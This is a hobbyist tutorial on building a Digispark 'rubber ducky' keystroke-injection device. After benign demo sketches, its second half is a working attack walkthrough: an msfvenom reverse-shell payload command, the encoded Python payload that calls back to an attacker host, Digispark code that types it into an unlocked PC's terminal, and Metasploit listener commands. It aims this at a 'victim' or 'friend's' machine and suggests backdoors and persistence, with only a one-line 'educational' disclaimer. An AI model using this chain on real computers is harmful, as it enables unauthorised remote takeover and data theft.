Arduino Rubber Ducky Introduction

Hey guys, let’s get our hands dirty. Ever heard of  USB rubber ducky? Well, simply it is a programmed USB keyboard in the form of a Pendrive, which will send the keystrokes to a device connected to it and can be used to prank or even hack unlocked PCs. 

arduino rubber ducky
Arduino HID PCB

Will you guys believe if I say, we can do it with a 1.5$ Arduino compatible board with simple coding without detailed knowledge on how USB works? Yes, you can make your own Arduino Rubber Ducky!

What you will learn?

In this post, I am going to show you can do cool stuff using Arduino HID functionality. You can make your Arduino to work as a keyboard or as a mouse and do pretty cool stuff with the push of a button.

Arduino Rubber Ducky Video Tutorial

I will be showing you how you can literally hack a PC and control it remotely using this tiny board. I will share a complete tutorial, codes, and circuit diagrams in the description! The codes are also available in GITHUB so feel free to download, edit and add more functions to it. Let’s get started!

About Our Sponsor – PCBWay

This project is sponsored by PCBWay. PCBWay is a PCB manufacturer specializing in PCB prototyping, low-volume production and neat and tidy PCB Assembly. They deliver high quality PCB faster and cheaper. 

As one of the most experienced PCB manufacturers in China, they pride themselves to be our best business partners as well as good friends in the every aspect of your PCB needs.

Digispark – Explained

This is Digispark. It is a light weight microcontroller development board. It comes with 6 GPIO pins, I2C and SPI serial communication and a USB interface. 

It also has 3 PWM pins which can be used to control l293d motor drivers or servo motors. We can use Arduino IDE to program Digispark but the way we upload the program is a little bit different than usual.

Here, I have explained everything from the Digispark introduction to the first code upload. Check it out if you are interested!

Digispark as HID

This board can also act as HID. HID or Human Interface Devices are Devices that take input from us and pass it on to the device connected to it. HID devices include keyboard, joystick, mouse, touchpad, graphic tablet, etc. 

hid devices

Let’s make use of this functionality and have some fun.

Steps – Arduino Rubber Ducky

Step 1 – The Circuit

Circuit Explained

I have designed a PCB that has some buttons so that I can run multiple codes without reprogramming the digispark.

rubberducky

This is the circuit, Since we have 5V coming out from the USB port, we don’t need additional supply. Here we have some switches, Resistors, and indicator LEDs. I will share the link of the PCB files in the description.

arduino hid attack

Getting the PCBs Done

Getting the PCB from PCBWay

To order your PCB from PCB way, Go to PCBWay and fill the board details in the instant order form.

From there you will be directed form where you can provide more elaborate board details and Gerber upload.

Update your board requirement information in the PCB Specification screen.

arduino rubber ducky

You can change the board thickness, board color, silk color, and even the type of finish you want. Some of these add-ons are going to increase the board cost.

Once you have all of the various options for your PCB selected, submit it for review. Before your board goes into manufacturing their team of professional technicians will review your design for any potential errors.

Once the review is completed, all that is left is to add to the cart, make the payment, and wait for your PCBs to arrive. It could take anywhere from 3 – to 6 days to be produced depending on the number of boards you ordered.

Soldering

The PCB will be manufactured and shipped within days and will be delivered to your doorstep within the mentioned time period.

arduino rubber ducky

Once you get the PCB in hand, all you have to do is solder the header pins and connect all the components.

Step 2 – Installing Digispark Drivers

Now lets install the drivers, board and library. Go to this link and download the drivers.

https://github.com/digistump/DigistumpArduino/releases/download/1.6.7/Digistump.Drivers.zip

Extract it and install the drivers

Step 3 – Install and Setting up Arduino IDE

Install Arduino

Download arduino IDE if you don’t have it. Download it from: https://www.arduino.cc/en/Main/Software

Install Board

Start the Arduino IDE and go to the “File” menu and select “Preferences” and paste this line of code in the Additional Board Manager URL.

http://digistump.com/package_digistump_index.json

Go to “Tools” menu and then the “Board” submenu – select “Boards Manager” and then select “Contributed”. Select the “Digistump AVR Boards” package and click the “Install” button.

Once it completes, close the “Boards Manager” window and go to Tools→Boards and select “Digispark (Default – 16.5mhz)”.

Install Library

Next we will install the Arduino Digikeyboard library which will make it easy for us to send HID commands to the PC using Digispark. This can be easily installed from the library manager itself.

Step 4 – Coding

Now we will start coding. Guys these are all the keystrokes you can send to your PC using Digispark using the Digikeyboard library. I will leave the link in the description because you will need to for coding!

Digikeyboard Library Keystrokes

Special Keys

  • MOD_CONTROL_LEFT – Left Ctrl key
  • MOD_SHIFT_LEFT – Left Shift key
  • MOD_ALT_LEFT – Left Alt key
  • MOD_GUI_LEFT – Left Windows key
  • MOD_CONTROL_RIGHT – Right Ctrl key
  • MOD_SHIFT_RIGHT – Right Shift key
  • MOD_ALT_RIGHT – Right Alt key
  • MOD_GUI_RIGHT – Right Windows key

Alphabets

  • KEY_A
  • KEY_B
  • KEY_C
  • KEY_D
  • KEY_E
  • KEY_F
  • KEY_G
  • KEY_H
  • KEY_I
  • KEY_J
  • KEY_K
  • KEY_L
  • KEY_M
  • KEY_N
  • KEY_O
  • KEY_P
  • KEY_Q
  • KEY_R
  • KEY_S
  • KEY_T
  • KEY_U
  • KEY_V
  • KEY_W
  • KEY_X
  • KEY_Y
  • KEY_Z

Numbers

  • KEY_1
  • KEY_2
  • KEY_3
  • KEY_4
  • KEY_5
  • KEY_6
  • KEY_7
  • KEY_8
  • KEY_9
  • KEY_0

Functions

  • KEY_F1
  • KEY_F2
  • KEY_F3
  • KEY_F4
  • KEY_F5
  • KEY_F6
  • KEY_F7
  • KEY_F8
  • KEY_F9
  • KEY_F10
  • KEY_F11
  • KEY_F12

Don’t worry if this looks confusing, you will understand better when we look into our code. 

Basic Codes

First I will show you the basic setup. Basically, we have 4 different buttons. We will assign 1 task for each button so that when one button is pressed, it will run the corresponding function and execute the task. 

#include <DigiKeyboard.h>

int button1, button2, button3, button4;

void setup()
{
pinMode(0, INPUT);
pinMode(1, INPUT);
pinMode(2, INPUT);
pinMode(3, INPUT);
}
void loop()
{
button1=digitalRead(0);
button2=digitalRead(1);
button3=digitalRead(2);
button4=digitalRead(3);

if(button1==1)
{
hello();
}
else if(button2==1)
{
lock();
}
else if(button3==1)
{
notepad();
}
else if(button4==1)
{
poweroff();
}
}

void hello()
{
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.println("Hello World");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(5000);
}

void lock()
{
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.sendKeyStroke( KEY_L , MOD_GUI_LEFT);
  DigiKeyboard.delay(5000);
}

void notepad() 
{
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_ALT_LEFT);
  DigiKeyboard.delay(250);
  DigiKeyboard.println("notepad");
}

void poweroff() 
{
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_ALT_LEFT);
  DigiKeyboard.delay(250);
  DigiKeyboard.println("cmd");
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("shutdown /s");
}
  • First function is to send keystroke of “Hello World”,
  • Second Function is to send the keystroke “Windows Button + L Key” to lock windows.
  • Third Function is to send keystrokes to open notepad.
  • And 4th Function is to send keystrokes to shutdown the PC.

Let’s upload and check it out.

First press button 1 and yeah! It will print hello world. Now lets try button 2 that will lock the PC. Now lets try button 3. Cool right? I will press button 4 at the end. Otherwise I will have to start everything all over again.

This way you can send keystrokes using your arduino to do some useful stuffs like media control, make your own keyboard, play pranks, or even hack PCs

Taking Control over a PC

Now, as promised, I will show you how to take over an unlocked PC and gain remote access to it. Please note that this is only for educational purposes and to show you how dangerous this little thing can be.

For this part, you will need a Linux PC with Metasploit installed in it. Metasploit framework is a collection of tools that can be used to write exploits and penetrate into remote machines. This tool is pre-installed in Kali Linux. In a moment, I will show you how it is done.

Creating Payload

Next, We have to create a code which when executed in the victim’s machine initiates a connection back to our PC. 

In the Terminal, execute the below command.msfvenom -p python/meterpreter/reverse_tcp LHOST=<IP ADDRESS OF YOUR MACHINE> LPORT=<PORT FOR REVERSE SHELL TO CONNECT ON> R > pythonpayload.py

Here, LHOST is the IP ADDRESS OF YOUR MACHINE and
LPORT is the PORT FOR REVERSE SHELL TO CONNECT ON

This will create a payload named pythonpaload.py.

The contents of the file looks somewhat like this

import

base64,sys;exec(base64.b64decode({2:str,3:lambda

b:bytes(b,’UTF-8′)}[sys.version_info[0]](‘aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQpzLmNvbm5lY3QoKCcxMC45LjcuMjA3Jyw5MDAwKSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==’)))

The Arduino Code for Digispark Rubber Ducky

Now open that file and copy all the contents in the file as shown in the video.

Below is the code which is uploaded to digispark. Copy the contents of the pythonpayload.py and paste it in the 9th line.

void setup()

{

DigiKeyboard.delay(2000);

DigiKeyboard.sendKeyStroke(KEY_T , MOD_CONTROL_LEFT | MOD_ALT_LEFT);

DigiKeyboard.delay(2000);

DigiKeyboard.println(“python “);

DigiKeyboard.delay(500);

DigiKeyboard.println(“Paste the python code here”);

DigiKeyboard.delay(1000);

DigiKeyboard.println(“quit()”);

DigiKeyboard.delay(500);

DigiKeyboard.println(“exit”);

}

void loop()

{

}

Basically, what this code does is

  • Wait for 2 seconds
  • Press ALT + CONTROL + T to open up the terminal
  • Wait for 2 seconds
  • Type in ‘python’ and Press Enter to start Python
  • Wait for 0.5 seconds
  • Type in the python exploit code and press enter to execute it
  • Wait for  1 second
  • Type ‘quit()’ and press enter to exit python
  • Wait for  0.5 seconds
  • Type exit and press enter to exit the terminal.

Now, Upload the code.

Setting Up the Listener

Next, we have to start the listener which will wait for incoming connections in the given port. Fire up Metasploit and execute the below codes in order.

msfconsole

use multi/handler

set PAYLOAD python/meterpreter/reverse_tcp

set LHOST <IP ADDRESS OF YOUR MACHINE>

set LPORT <PORT FOR REVERSE SHELL TO CONNECT ON>

exploit

This will start the listener.

Launch the Attack

Now all you have to do is connect this digispark to our Victims unlocked machine. All you need is a 10 second window. All the codes will run in 5 seconds.

Once you get the shell, you can do almost anything with that; create a persistent back door, upload or download files, create another user and provide it SSH access, possibilities are endless.

This code works if your friend’s PC uses linux OS. Similarly we can write a code for windows too. The windows version will be updated in the link below. Follow the link in the description and you will complete complete details on the project. The codes are also available in GITHUB and feel free to download, edit and add more functions to it.

See you soon guys. See you in the next video. 

Hey there!

Forgot password?

Forgot your password?

Enter your account data and we will send you a link to reset your password.

Your password reset link appears to be invalid or expired.

Close
of

Processing files…